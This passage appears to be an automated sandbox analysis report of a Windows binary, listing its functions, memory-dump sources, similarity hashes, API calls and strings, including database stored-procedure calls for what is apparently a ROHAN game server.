                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 465906022657298b01b90d74c89df624c0fa2d3890f1ad2577895afbf1d1789c
                                                                                      • Instruction ID: 8bd90bc04388bf1308068b2ea6251cff80028ba528727cf23b616e2b46838ab6
                                                                                      • Opcode Fuzzy Hash: 465906022657298b01b90d74c89df624c0fa2d3890f1ad2577895afbf1d1789c
                                                                                      • Instruction Fuzzy Hash: CE31217098011BABEB34DB09CD42FBA7335EB44718F11C2E8F6286A7C5E571AD809F64
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044BC1B
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044BC4D
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044BC80
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044BCB3
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044BCE5
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000012,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?), ref: 0044BD18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69d2db5a9b17f762149ec33314ca1a2f4198ea65b10b173f211dfdc050ab326d
                                                                                      • Instruction ID: c47791d8a40f2745c1ee4b282234c43c58eb85c124beff7a3f4c7a93690dde22
                                                                                      • Opcode Fuzzy Hash: 69d2db5a9b17f762149ec33314ca1a2f4198ea65b10b173f211dfdc050ab326d
                                                                                      • Instruction Fuzzy Hash: C2313074A10118ABEB64DB09CC5AFAA7374EF41718F2482C8F61C6B3D1DA756EC08F54
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(?,40000000,00000001,00000000,004681D6,00000080,00000000,?,004681D6,?,?), ref: 0046839F
                                                                                      • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,?,004681D6), ref: 004683B8
                                                                                      • GetLastError.KERNEL32(?,?,?,004681D6), ref: 004683D5
                                                                                      Strings
                                                                                      • %s ErrorCode = %d, xrefs: 004683E0
                                                                                      • c:\geolog_fileopen_failed.log, xrefs: 004683C5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CreateErrorLastPointer
                                                                                      • String ID: %s ErrorCode = %d$c:\geolog_fileopen_failed.log
                                                                                      • API String ID: 2723331319-2418729633
                                                                                      • Opcode ID: 961118bfebade5c6cdcdd55db86105ac2b897e77af188138262856ba31a444ed
                                                                                      • Instruction ID: dfd5aab86345832c979d2d6883e7b56247cd95603b25964561d600029c0d1329
                                                                                      • Opcode Fuzzy Hash: 961118bfebade5c6cdcdd55db86105ac2b897e77af188138262856ba31a444ed
                                                                                      • Instruction Fuzzy Hash: 653164B5E00208FBDB04DFA4C895FAE7B71AB45700F24819EF9055B381DA75AE41DB8A
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,0000000A), ref: 0046A2F0
                                                                                      • FlushInstructionCache.KERNEL32(00000000), ref: 0046A2F7
                                                                                      • GetCurrentProcess.KERNEL32(?,0000000A), ref: 0046A33A
                                                                                      • FlushInstructionCache.KERNEL32(00000000), ref: 0046A341
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CacheCurrentFlushInstructionProcess
                                                                                      • String ID: !2A
                                                                                      • API String ID: 2564211676-711315634
                                                                                      • Opcode ID: c49c2754a25f5437073a8d151e79d55c06117224aa46c67d600e700ae4b0f9c4
                                                                                      • Instruction ID: 3f8d2dcbef82a9d4ec0291c0a17b6212cd9adbe6f5bfd49091a1e5581358cb0e
                                                                                      • Opcode Fuzzy Hash: c49c2754a25f5437073a8d151e79d55c06117224aa46c67d600e700ae4b0f9c4
                                                                                      • Instruction Fuzzy Hash: 5B310CB4E0020ADFCB04CF98D495AAEFBB1FF49314F148299D9056B392C775A941CFA5
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000001,?,00411C00,?), ref: 00461525
                                                                                      • SetProcessPriorityBoost.KERNEL32(00000000,?,00411C00,?), ref: 0046152C
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00411C00,?), ref: 00461544
                                                                                      • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,00411C00,?), ref: 00461557
                                                                                        • Part of subcall function 004619A0: GetTickCount.KERNEL32 ref: 004619AD
                                                                                      Strings
                                                                                      • RegisterWait error for timer, xrefs: 0046158C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateProcess$BoostCompletionCountCurrentEventPortPriorityTick
                                                                                      • String ID: RegisterWait error for timer
                                                                                      • API String ID: 3645067099-3143449959
                                                                                      • Opcode ID: 65c9f6c28d5fb6e1c83f03ca9c60011000cd11b432d906010aca1bea2fa17b40
                                                                                      • Instruction ID: 9d1aeba88d4a70e92938a5e74b08c3457471ee20170aa2af629056f34de5be7e
                                                                                      • Opcode Fuzzy Hash: 65c9f6c28d5fb6e1c83f03ca9c60011000cd11b432d906010aca1bea2fa17b40
                                                                                      • Instruction Fuzzy Hash: B821F671A402447BE7106FA6AC46F457655EB80709F10003AF6099F2E3E6B9780587DE
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_CompleteCharQuest] (?, ?)},000000FD), ref: 0042F36C
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042F3AB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042F3E0
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F418
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_CompleteCharQuest] (?, ?)}, xrefs: 0042F363
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_CompleteCharQuest] (?, ?)}
                                                                                      • API String ID: 0-3042079049
                                                                                      • Opcode ID: 93d112b87dd90862320525bb7eb804fc3478403a733ac88946dc5b5d6632f8dd
                                                                                      • Instruction ID: 0de2a04e0a5202d302f4eccd3f8ca3730e28d601ea67cb4d2c7edf840c75fe0e
                                                                                      • Opcode Fuzzy Hash: 93d112b87dd90862320525bb7eb804fc3478403a733ac88946dc5b5d6632f8dd
                                                                                      • Instruction Fuzzy Hash: 1E21F1B0A41658AFEB24CF44CC51F9A7376EBC4715F208289F6187B6C4D6736D908F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_SetGuildNotice](?, ?)},000000FD), ref: 0042D68F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042D6CE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042D703
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,00000064,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042D743
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_SetGuildNotice](?, ?)}, xrefs: 0042D686
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_SetGuildNotice](?, ?)}
                                                                                      • API String ID: 0-778274794
                                                                                      • Opcode ID: aa0fd24827b62d6e253d3bc930d82088bc515f902c4dba02327e9130e41f7a34
                                                                                      • Instruction ID: b6b00906f934536c618dde2e10e891ba4d07c678ff6a1b149d1c3baa1d16a6f5
                                                                                      • Opcode Fuzzy Hash: aa0fd24827b62d6e253d3bc930d82088bc515f902c4dba02327e9130e41f7a34
                                                                                      • Instruction Fuzzy Hash: 692103B064461CABDB24CF44CC41FEB7375EB84715F108689F628AA2C4D6B16B808F98
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetTNGuildNotice](?, ?)},000000FD), ref: 0042D776
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042D7B5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042D7EA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,00000064,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042D82A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetTNGuildNotice](?, ?)}, xrefs: 0042D76D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
